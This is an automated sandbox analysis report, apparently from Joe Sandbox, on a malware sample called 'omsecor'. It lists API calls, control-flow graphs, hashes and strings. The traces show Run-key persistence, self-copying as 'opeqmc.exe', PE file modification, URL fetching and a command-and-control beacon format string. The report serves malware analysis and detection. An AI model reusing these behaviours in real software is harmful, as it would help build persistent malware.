                          • TlsGetValue.KERNEL32(00000004,?,?,?,0040B078,004025C7,0040B078,Microsoft Visual C++ Runtime Library,00012010), ref: 00401ACE
                          • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,?,?,0040B078,004025C7,0040B078,Microsoft Visual C++ Runtime Library,00012010), ref: 00401AE3
                          • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 00401AFE
                          Strings
                          Memory Dump Source
                          • Source File: 0000001A.00000002.2374099617.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001A.00000002.2374028457.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 0000001A.00000002.2374099617.000000000040D000.00000040.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 0000001A.00000002.2374203937.0000000000422000.00000008.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_26_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Value$AddressHandleModuleProc
                          • String ID: EncodePointer$KERNEL32.DLL
                          • API String ID: 1929421221-3682587211
                          • Opcode ID: cfafac40d43195ef6ab0f83e6a66070465950e04f68e4f312de4a4817b66f2e0
                          • Instruction ID: 2de7d8fd10128b17cfc71597f2b569db04ade18300f5c4710948ea3b5a4a2571
                          • Opcode Fuzzy Hash: cfafac40d43195ef6ab0f83e6a66070465950e04f68e4f312de4a4817b66f2e0
                          • Instruction Fuzzy Hash: 68F06D307017169BD7219F25DE04A5A3AB8AF80790B16417AB844F62F4EF38DC029A6D

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 412 401b21-401b32 TlsGetValue 413 401b34-401b3c 412->413 414 401b55-401b64 GetModuleHandleA 412->414 413->414 415 401b3e-401b4b TlsGetValue 413->415 416 401b66-401b6d call 401a3e 414->416 417 401b89-401b8e 414->417 415->414 421 401b4d-401b53 415->421 416->417 422 401b6f-401b75 GetProcAddress 416->422 423 401b7b-401b7d 421->423 422->423 423->417 424 401b7f-401b85 423->424 424->417
                          APIs
                          • TlsGetValue.KERNEL32(00000000,00401BB6,?,?,?,00402F66), ref: 00401B2E
                          • TlsGetValue.KERNEL32(00000004,?,?,?,00402F66), ref: 00401B45
                          • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,?,?,00402F66), ref: 00401B5A
                          • GetProcAddress.KERNEL32(00000000,DecodePointer), ref: 00401B75
                          Strings
                          Memory Dump Source
                          • Source File: 0000001A.00000002.2374099617.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001A.00000002.2374028457.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 0000001A.00000002.2374099617.000000000040D000.00000040.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 0000001A.00000002.2374203937.0000000000422000.00000008.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_26_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Value$AddressHandleModuleProc
                          • String ID: DecodePointer$KERNEL32.DLL
                          • API String ID: 1929421221-629428536
                          • Opcode ID: 436f779fc0fdf30fb8c2a4f5b6e2e396cf7c0272443af951d572ffac3d80a1eb
                          • Instruction ID: 1a7e216e592b3cd04d2002f0154b272c3d781bc2d345389bf2442321812c8d59
                          • Opcode Fuzzy Hash: 436f779fc0fdf30fb8c2a4f5b6e2e396cf7c0272443af951d572ffac3d80a1eb
                          • Instruction Fuzzy Hash: 96F062305013129BC7215F24DE44E6A3AB89F407947154136F854F22F0EF34DC018A6D

                          Control-flow Graph

                          APIs
                          • GetStartupInfoA.KERNEL32(?), ref: 004016EA
                          • GetProcessHeap.KERNEL32(00000000,00000094), ref: 00401705
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00401708
                          • _fast_error_exit.LIBCMT ref: 00401716
                            • Part of subcall function 00401671: __FF_MSGBANNER.LIBCMT ref: 0040167A
                          • ___security_init_cookie.LIBCMT ref: 004018B6
                          Strings
                          Memory Dump Source
                          • Source File: 0000001A.00000002.2374099617.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001A.00000002.2374028457.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 0000001A.00000002.2374099617.000000000040D000.00000040.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 0000001A.00000002.2374203937.0000000000422000.00000008.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_26_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Heap$AllocateInfoProcessStartup___security_init_cookie_fast_error_exit
                          • String ID: j`h
                          • API String ID: 2660455748-2627015977
                          • Opcode ID: aba137c0f2f88c3b9200040e126f3ca684e81be6c5eda89adfc1ccd5f8954634
                          • Instruction ID: 7291aa48b631972549e6df949c7a5fbc9f7bec4cf14f78cf3737268845182a7c
                          • Opcode Fuzzy Hash: aba137c0f2f88c3b9200040e126f3ca684e81be6c5eda89adfc1ccd5f8954634
                          • Instruction Fuzzy Hash: C3F02E36D01705A7E720A7B4CE49B6D3134AB88765F35013BF5017B2E2CABC4D06A62D
                          APIs
                          • GetStartupInfoA.KERNEL32(?), ref: 004016EA
                          • GetProcessHeap.KERNEL32(00000000,00000094), ref: 00401705
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00401708
                          • _fast_error_exit.LIBCMT ref: 00401716
                            • Part of subcall function 00401671: __FF_MSGBANNER.LIBCMT ref: 0040167A
                          • ___security_init_cookie.LIBCMT ref: 004018B6
                          Strings
                          Memory Dump Source
                          • Source File: 0000001A.00000002.2374099617.000000000040D000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001A.00000002.2374028457.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 0000001A.00000002.2374099617.0000000000401000.00000040.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 0000001A.00000002.2374203937.0000000000422000.00000008.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_26_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Heap$AllocateInfoProcessStartup___security_init_cookie_fast_error_exit
                          • String ID: j`h
                          • API String ID: 2660455748-2627015977
                          • Opcode ID: c8d3cbbb43655427b4a603559900b38778fbedebf47b5c9131e32ddd9e0d4b3d
                          • Instruction ID: 38895570f31eb67b982826470c9dd1e6c230b0faa58df9c9f10e023fb9096192
                          • Opcode Fuzzy Hash: c8d3cbbb43655427b4a603559900b38778fbedebf47b5c9131e32ddd9e0d4b3d
                          • Instruction Fuzzy Hash: 4DF0E936E48301D7E720A7A09D49B2D3134AB44765F34053BE001BB2E1CDBC4942661F
                          APIs
                          • __lock.LIBCMT ref: 00403F82
                            • Part of subcall function 004034EE: __mtinitlocknum.LIBCMT ref: 00403502
                            • Part of subcall function 004034EE: __amsg_exit.LIBCMT ref: 0040350E
                            • Part of subcall function 004034EE: RtlEnterCriticalSection.NTDLL(?), ref: 00403516
                          • ___sbh_find_block.LIBCMT ref: 00403F8D
                          • ___sbh_free_block.LIBCMT ref: 00403F9C
                          • HeapFree.KERNEL32(00000000,?,00409450,0000000C,004034CF,00000000,004093D0,0000000C,00403507,?,?,?,00406798,00000004,00409530,0000000C), ref: 00403FCC
                          • GetLastError.KERNEL32(?,00406798,00000004,00409530,0000000C,00404045,?,?,00000000,00000000,00000000,00401CEF,00000001,00000214), ref: 00403FDD
                          Memory Dump Source
                          • Source File: 0000001A.00000002.2374099617.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001A.00000002.2374028457.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 0000001A.00000002.2374099617.000000000040D000.00000040.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 0000001A.00000002.2374203937.0000000000422000.00000008.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_26_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                          • String ID:
                          • API String ID: 2714421763-0
                          • Opcode ID: 288a25c0387cb816e710d6056d2e667d0bdf05a7bdcb3ee8ac501960d13b8eb0
                          • Instruction ID: 478c35e85f2b107ed22a8aba67e00a0e018390ca299f0d6e226d856ee505d4b6
                          • Opcode Fuzzy Hash: 288a25c0387cb816e710d6056d2e667d0bdf05a7bdcb3ee8ac501960d13b8eb0
                          • Instruction Fuzzy Hash: AB012C71D05602AADB207FB29A0AB5E7A78DF0076AF20413FF404B61D1CB7C8A449A9D
                          APIs
                            • Part of subcall function 00401D3D: __amsg_exit.LIBCMT ref: 00401D4B
                          • __amsg_exit.LIBCMT ref: 00403A5F
                          • __lock.LIBCMT ref: 00403A6F
                          • InterlockedDecrement.KERNEL32(?), ref: 00403A8C
                          • InterlockedIncrement.KERNEL32(00601588), ref: 00403AB7
                          Memory Dump Source
                          • Source File: 0000001A.00000002.2374099617.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001A.00000002.2374028457.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 0000001A.00000002.2374099617.000000000040D000.00000040.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 0000001A.00000002.2374203937.0000000000422000.00000008.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_26_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Interlocked__amsg_exit$DecrementIncrement__lock
                          • String ID:
                          • API String ID: 4129207761-0
                          • Opcode ID: 8585fda054ee7361396d1f478d0024bbf818f9282079b570ad35bde21b9f8bf2
                          • Instruction ID: 3b707b5fd0894213fb8e8695ce472a26b52a1803b1b57e4fe7db1faaf9775e12
                          • Opcode Fuzzy Hash: 8585fda054ee7361396d1f478d0024bbf818f9282079b570ad35bde21b9f8bf2
                          • Instruction Fuzzy Hash: 3A018E32E00B119BD611AF6A990974A7B64BB05716F05403BE890773D1C73CAB51DFDE
                          APIs
                          • GetLastError.KERNEL32(?,00000000,00404281,00402202,00000000,00402EFA,FFFFFFFE,?,?,?,?,00402F66), ref: 00401CC8
                            • Part of subcall function 00401B98: TlsGetValue.KERNEL32(00000000,00401CDB,?,?,?,00402F66), ref: 00401B9F
                            • Part of subcall function 00401B98: TlsSetValue.KERNEL32(00000000,?,?,00402F66), ref: 00401BC0
                          • __calloc_crt.LIBCMT ref: 00401CEA
                            • Part of subcall function 00404032: __calloc_impl.LIBCMT ref: 00404040
                            • Part of subcall function 00404032: Sleep.KERNEL32(00000000), ref: 00404057
                            • Part of subcall function 00401B21: TlsGetValue.KERNEL32(00000000,00401BB6,?,?,?,00402F66), ref: 00401B2E
                            • Part of subcall function 00401B21: TlsGetValue.KERNEL32(00000004,?,?,?,00402F66), ref: 00401B45
                            • Part of subcall function 00401C07: GetModuleHandleA.KERNEL32(KERNEL32.DLL,00409328,0000000C,00401D18,00000000,00000000,?,?,?,00402F66), ref: 00401C18
                            • Part of subcall function 00401C07: GetProcAddress.KERNEL32(?,EncodePointer), ref: 00401C4C
                            • Part of subcall function 00401C07: GetProcAddress.KERNEL32(?,DecodePointer), ref: 00401C5C
                            • Part of subcall function 00401C07: InterlockedIncrement.KERNEL32(0040A3C8), ref: 00401C7E
                            • Part of subcall function 00401C07: __lock.LIBCMT ref: 00401C86
                            • Part of subcall function 00401C07: ___addlocaleref.LIBCMT ref: 00401CA5
                          • GetCurrentThreadId.KERNEL32 ref: 00401D1A
                          • SetLastError.KERNEL32(00000000,?,?,?,00402F66), ref: 00401D32
                          Memory Dump Source
                          • Source File: 0000001A.00000002.2374099617.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001A.00000002.2374028457.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 0000001A.00000002.2374099617.000000000040D000.00000040.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 0000001A.00000002.2374203937.0000000000422000.00000008.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_26_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Value$AddressErrorLastProc$CurrentHandleIncrementInterlockedModuleSleepThread___addlocaleref__calloc_crt__calloc_impl__lock
                          • String ID:
                          • API String ID: 1081334783-0
                          • Opcode ID: 098acf1058f6266e08016df3b7da3ea01f889e9df5624f40869082c495d6053c
                          • Instruction ID: d2849ffa799b97934cc6d9bfafbcb639600e9549b280b5eba9c9c239b681eae2
                          • Opcode Fuzzy Hash: 098acf1058f6266e08016df3b7da3ea01f889e9df5624f40869082c495d6053c
                          • Instruction Fuzzy Hash: 2EF0FF325447229AD6363BB96D0AA8F3AA49F41761711093FF580B61F0CF3CD80296AD

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 302 40abd9-40abed call 40ac20 304 40abf2-40abf5 302->304 305 40abf7-40ac0c FindFirstFileW 304->305 306 40ac1a 304->306 305->306 307 40ac0e-40ac18 FindClose 305->307 308 40ac1c-40ac1f 306->308 307->308
                          APIs
                            • Part of subcall function 0040AC20: RegOpenKeyExW.KERNELBASE(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,771B0900,00000400,00000000, /nomove,?,0040AB30,?,?,0040B3E5), ref: 0040AC44
                            • Part of subcall function 0040AC20: RegOpenKeyExW.KERNELBASE(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,?,0040AB30,?,?,0040B3E5), ref: 0040AC72
                          • FindFirstFileW.KERNEL32(?,00000000), ref: 0040AC03
                          • FindClose.KERNEL32(00000000), ref: 0040AC0F
                          Memory Dump Source
                          • Source File: 0000001C.00000002.2589397988.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: FindOpen$CloseFileFirst
                          • String ID:
                          • API String ID: 3155378417-0
                          • Opcode ID: ab3d299b7ad4ae48143099222020c13c56cdbf39ef5f27e8c74799f3a551cc1f
                          • Instruction ID: fa0310e4c65bbc590993533f650c85f5e3ee77ef27cd51fa1c8f473dbf319076
                          • Opcode Fuzzy Hash: ab3d299b7ad4ae48143099222020c13c56cdbf39ef5f27e8c74799f3a551cc1f
                          • Instruction Fuzzy Hash: 5DE0D87160C7044BE220E7B49D0C967B3DCAB45325F000F36A9B6E20C0FA38D46A465F

                          Control-flow Graph

                          APIs
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040B36C
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040B39D
                            • Part of subcall function 004069FD: RegCreateKeyExW.ADVAPI32(0040EA48,00000000,00000000,00000000,00000000,00020006,00000000,00000002,0040EA48,?,?,?,?,00406AD3,80000001,AppEvents\Schemes\Apps\Explorer\Navigating\.current), ref: 00406A22
                          • GetLastError.KERNEL32(00000004), ref: 0040B3CA
                          • Sleep.KERNEL32(00002710), ref: 0040B3F7
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040B413
                          • CopyFileW.KERNEL32(?,?,00000000), ref: 0040B435
                          • ExitProcess.KERNEL32 ref: 0040B44D
                            • Part of subcall function 0040AC20: RegOpenKeyExW.KERNELBASE(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,771B0900,00000400,00000000, /nomove,?,0040AB30,?,?,0040B3E5), ref: 0040AC44
                            • Part of subcall function 0040AC20: RegOpenKeyExW.KERNELBASE(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,?,0040AB30,?,?,0040B3E5), ref: 0040AC72
                          • GetLastError.KERNEL32(00000004), ref: 0040B48D
                          • GetLastError.KERNEL32(00000004), ref: 0040B49A
                          • ExpandEnvironmentStringsW.KERNEL32(?,00000400), ref: 0040B4C7
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040B4D7
                          • GetLastError.KERNEL32(00000004), ref: 0040B500
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.2589397988.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: File$ErrorLastModuleName$Open$CopyCreateEnvironmentExitExpandProcessSleepStrings
                          • String ID: /nomove$IueiOod$SOFTWARE\Microsoft\Windows\CurrentVersion\Run$opeqmc.exe
                          • API String ID: 3692109554-477663111
                          • Opcode ID: a37a2c0829b51652c0125789b7ef107c293a8625708184dc08050438480bf6fc
                          • Instruction ID: ccf8aad4361994264e72a39918ed7d53ff083e628d4a69ee62a5d407c68d8035
                          • Opcode Fuzzy Hash: a37a2c0829b51652c0125789b7ef107c293a8625708184dc08050438480bf6fc
                          • Instruction Fuzzy Hash: 8C4127719042186AE710B7A19D46FAB73ACEF04345F14447BBB05F11C2EB789A548AAF

                          Control-flow Graph

                          APIs
                          • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,00000000,00000400), ref: 004075FC
                          • CreateFileW.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 00407618
                          • GetFileSize.KERNEL32(?,00000000), ref: 0040762E
                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00407638
                          • HeapAlloc.KERNEL32(00000000), ref: 0040763F
                          • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00407660
                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040767F
                          • SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 00407691
                          • ReadFile.KERNEL32(?,?,00000040,?,00000000), ref: 004076A1
                          • SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 004076AF
                          • ReadFile.KERNEL32(?,?,000000F8,?,00000000), ref: 004076C5
                          • SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 004076EF
                          • WriteFile.KERNEL32(?,?,000000F8,?,00000000), ref: 00407705
                          • CloseHandle.KERNEL32(?), ref: 00407714
                          • CloseHandle.KERNEL32(?), ref: 00407719
                          Memory Dump Source
                          • Source File: 0000001C.00000002.2589397988.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: File$PointerRead$CloseCreateHandleHeapWrite$AllocProcessSize
                          • String ID:
                          • API String ID: 1458499590-0
                          • Opcode ID: 93e258daf756a991a400698467a0f3e6930ee28086f0462060147eb388563e29
                          • Instruction ID: 7ae3b020874f099f6a4231377d147a855b3f50186be4225f3fece46b7b724b47
                          • Opcode Fuzzy Hash: 93e258daf756a991a400698467a0f3e6930ee28086f0462060147eb388563e29
                          • Instruction Fuzzy Hash: F0416A71901028BADB209BA2DD48EEFBF7DEF45390F104476F619F21A0D7709A10DB64

                          Control-flow Graph

                          APIs
                          • InternetOpenUrlW.WININET(?,hOA,?,00000000,04400000,00000000), ref: 00409CCB
                          • GetProcessHeap.KERNEL32(00000000,00002001,?,?,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409CF4
                          • HeapAlloc.KERNEL32(00000000,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409CF7
                          • InternetReadFile.WININET(?,?,00001000,?), ref: 00409D6E
                          • GetProcessHeap.KERNEL32(00000000,00000002,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409D80
                          • HeapAlloc.KERNEL32(00000000,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409D83
                          • GetProcessHeap.KERNEL32(00000000,00000000,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409DE3
                          • HeapFree.KERNEL32(00000000,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409DE6
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.2589397988.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Heap$Process$AllocInternet$FileFreeOpenRead
                          • String ID: hOA
                          • API String ID: 1355009786-3485425990
                          • Opcode ID: 786a5954c9ab5f0fe889d4d88a95b872a4b6a838963cd3095893ed4ca2eaaa4a
                          • Instruction ID: 638041e7f74e2b46c75c1535d5ef76f15aa532bf5b3977fbb34850ab96fc5943
                          • Opcode Fuzzy Hash: 786a5954c9ab5f0fe889d4d88a95b872a4b6a838963cd3095893ed4ca2eaaa4a
                          • Instruction Fuzzy Hash: 1B418B71900209FFEB119F65C844BAA7BA9FF44355F14847AF819E6292E778CE80CF54

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.2589397988.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: CountTick
                          • String ID: .html$0$From: $Page generated at: $Via: $^key=$^nocrypt$hOA
                          • API String ID: 536389180-697497794
                          • Opcode ID: 114e4e40ed3da380897df1d948c25e04c4e8011c16955a8b70e5daac7b5a3a86
                          • Instruction ID: 73e0daeea7a9f5f4b783dd0519eebdf5205f1bdf48cad4214514e0173d2ce6b9
                          • Opcode Fuzzy Hash: 114e4e40ed3da380897df1d948c25e04c4e8011c16955a8b70e5daac7b5a3a86
                          • Instruction Fuzzy Hash: 27416131A0161997CB25EBA2DC51BDE7369FF44308F0044BFB909B71C1EA78AE948F59

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 169 40a786-40a79a 170 40a7b3-40a7ea call 405511 call 4056f9 call 405529 169->170 171 40a79c 169->171 182 40a7f8-40a7fb call 4056f9 170->182 183 40a7ec-40a7f6 170->183 172 40a7a9 call 406d14 171->172 176 40a7ae-40a7b1 172->176 176->170 178 40a79e-40a7a3 Sleep 176->178 178->172 184 40a800-40a815 call 405529 182->184 183->184 188 40a823-40a826 call 4056f9 184->188 189 40a817-40a821 184->189 190 40a82b-40a846 call 405529 call 406cb5 188->190 189->190 196 40a854 call 4056f9 190->196 197 40a848-40a852 190->197 198 40a859-40a87e call 405529 call 4078cb call 40a718 196->198 197->198 206 40a880-40a892 call 40a744 198->206 209 40a894-40a899 Sleep 206->209 210 40a89f-40a8c5 call 406e69 206->210 209->210 213 40a8d2-40a8d5 210->213 214 40a8c7-40a8cc Sleep 210->214 215 40a8d7-40a8da 213->215 216 40a8dc-40a8df 213->216 214->213 215->216 217 40a8e1-40a8f8 GetProcessHeap HeapFree 215->217 216->206 216->217
                          APIs
                          • Sleep.KERNEL32(00002710,00000000,00000000,00000000), ref: 0040A7A3
                          • Sleep.KERNEL32(0000EA60,?,00000000,00000000,00000000), ref: 0040A899
                          • Sleep.KERNELBASE(00002710,?,?,?,?,?,00000000,00000000,00000000), ref: 0040A8CC
                          • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0040A8E5
                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,00000000,00000000,00000000), ref: 0040A8EC
                            • Part of subcall function 00406D14: InternetAttemptConnect.WININET(00000000), ref: 00406D18
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.2589397988.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Sleep$Heap$AttemptConnectFreeInternetProcess
                          • String ID: 0$confirm^rev=%s^code=%s^param=%s^os=%s
                          • API String ID: 3100629401-2436734164
                          • Opcode ID: c622fb37aa2467ece8f64e14a3bc52ff303aefc1e596290383a82c184368ac36
                          • Instruction ID: 7defdabbc875a2827947a9af70fbac2689cb4d570e6f2fffa55db425585f7fd8
                          • Opcode Fuzzy Hash: c622fb37aa2467ece8f64e14a3bc52ff303aefc1e596290383a82c184368ac36
                          • Instruction Fuzzy Hash: C0418372D00618AACB11EBE1DC859DF73BCEF44304F10847BF505B6181EA789A558F9E

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 218 40782a-40786f GetModuleFileNameW CreateFileW 219 407871-407886 GetFileTime CloseHandle 218->219 220 407888-40788e GetTickCount 218->220 221 4078b0-4078ca call 4057b5 219->221 222 407893-40789d call 40584d 220->222 227 4078a6-4078ae 222->227 228 40789f-4078a5 222->228 227->221 227->222 228->227
                          APIs
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000400,00000000,UniqueNum), ref: 0040784D
                          • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 00407864
                          • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 00407879
                          • CloseHandle.KERNEL32(00000000), ref: 00407880
                          • GetTickCount.KERNEL32 ref: 00407888
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.2589397988.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: File$CloseCountCreateHandleModuleNameTickTime
                          • String ID: UniqueNum
                          • API String ID: 1853814767-3816303966
                          • Opcode ID: ad12cffd4843a03ac357a7cbd35bb16f9c39c4118ba2163eb990dc6e8f3d9bd4
                          • Instruction ID: 2f8cc66c71eb5b32faf52737d8a911681d4da4e376004c23895cdbe2f04b10ac
                          • Opcode Fuzzy Hash: ad12cffd4843a03ac357a7cbd35bb16f9c39c4118ba2163eb990dc6e8f3d9bd4
                          • Instruction Fuzzy Hash: AE110633419220ABD210AB65EC4CA9B7FACEF45760F004A3AF964E21D0D6349211C7AB

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 229 407e2b-407e3b 230 407e3d-407e3f call 407cd7 229->230 231 407e4e-407e7c SetFilePointer ReadFile 229->231 236 407e44-407e4c 230->236 233 407eba 231->233 234 407e7e-407e82 231->234 235 407ebc-407ebe 233->235 234->233 237 407e84 234->237 236->231 236->233 238 407e86-407e8f 237->238 238->238 239 407e91-407ea7 call 405493 238->239 239->233 242 407ea9-407eb8 call 405511 239->242 242->235
                          APIs
                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,UniqueNum), ref: 00407E5C
                          • ReadFile.KERNEL32(?,00000064,00000001,00000000), ref: 00407E74
                            • Part of subcall function 00407CD7: GetModuleFileNameW.KERNEL32(00000000,?,00001000,00000000,00000000,?,00407E44,00000001,UniqueNum), ref: 00407CF6
                            • Part of subcall function 00407CD7: CreateFileW.KERNELBASE(?,C0000000,00000000,00000000,00000004,00000002,00000000,?,00407E44,00000001,UniqueNum), ref: 00407D48
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.2589397988.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: File$CreateModuleNamePointerRead
                          • String ID: UniqueNum$d$hOAd$x
                          • API String ID: 1528952607-1018652783
                          • Opcode ID: 015ecc0cc43ae81723c1e035d0cdbf130f909c8143b489dc0bfa89a80df37f55
                          • Instruction ID: 0df55d11f519ebf6f0451cc58b4543fb7278309a9039aac926228ebb90f40a66
                          • Opcode Fuzzy Hash: 015ecc0cc43ae81723c1e035d0cdbf130f909c8143b489dc0bfa89a80df37f55
                          • Instruction Fuzzy Hash: 5311A531D09308AADF109B61DD05BDB3B6AAB00324F218676E612F61E0E7749D44CBAE

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 245 40ac20-40ac48 RegOpenKeyExW 246 40ac60-40ac76 RegOpenKeyExW 245->246 247 40ac4a-40ac55 call 4069c0 245->247 248 40ac78-40ac7a 246->248 249 40ac7c-40ac87 call 4069c0 246->249 253 40ac5a-40ac5e 247->253 251 40ac8e-40ac92 248->251 254 40ac8c-40ac8d 249->254 253->246 253->251 254->251
                          APIs
                          • RegOpenKeyExW.KERNELBASE(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,771B0900,00000400,00000000, /nomove,?,0040AB30,?,?,0040B3E5), ref: 0040AC44
                          • RegOpenKeyExW.KERNELBASE(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,?,0040AB30,?,?,0040B3E5), ref: 0040AC72
                            • Part of subcall function 004069C0: RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,00000000,7686E9B0,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?), ref: 004069E3
                            • Part of subcall function 004069C0: RegCloseKey.KERNELBASE(00000000,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?,?,0040B3E5), ref: 004069ED
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.2589397988.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
